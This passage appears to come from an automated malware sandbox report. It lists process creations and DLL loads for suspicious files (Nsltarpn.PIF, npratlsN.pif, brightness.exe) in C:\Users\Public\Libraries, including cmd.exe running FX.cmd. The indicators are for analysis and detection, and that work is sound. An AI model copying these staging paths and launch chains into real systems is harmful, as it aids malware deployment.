          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: url.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winhttpcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: am.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ????.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ?.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: tquery.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: spp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: spp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: spp.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppwmi.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppcext.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: winscard.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\brightness.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: wldp.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: amsi.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: userenv.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: profapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: version.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rasman.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: secur32.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: schannel.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: apphelp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: version.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: uxtheme.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: url.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieframe.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: iertutil.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: netapi32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: userenv.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winhttp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: wkscli.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: netutils.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: amsi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: smartscreenps.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: kernel.appcore.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winmm.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: wininet.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sspicli.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: windows.storage.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: wldp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: profapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieproxy.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieproxy.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieproxy.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mssip32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mssip32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mssip32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mswsock.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: iphlpapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winnsi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??????????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???e???????????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???e???????????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: tquery.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: cryptdll.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: spp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vssapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vsstrace.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: spp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vssapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vsstrace.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mssip32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: endpointdlp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: endpointdlp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: endpointdlp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: endpointdlp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: advapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: advapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: advapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: advapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: advapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: advapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: advapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: spp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vssapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vsstrace.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppwmi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: slc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppcext.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winscard.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: devobj.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: cryptsp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: rsaenh.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: cryptbase.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: kernel.appcore.dll
          Source: C:\Users\Public\Libraries\npratlsN.pifSection loaded: uxtheme.dll
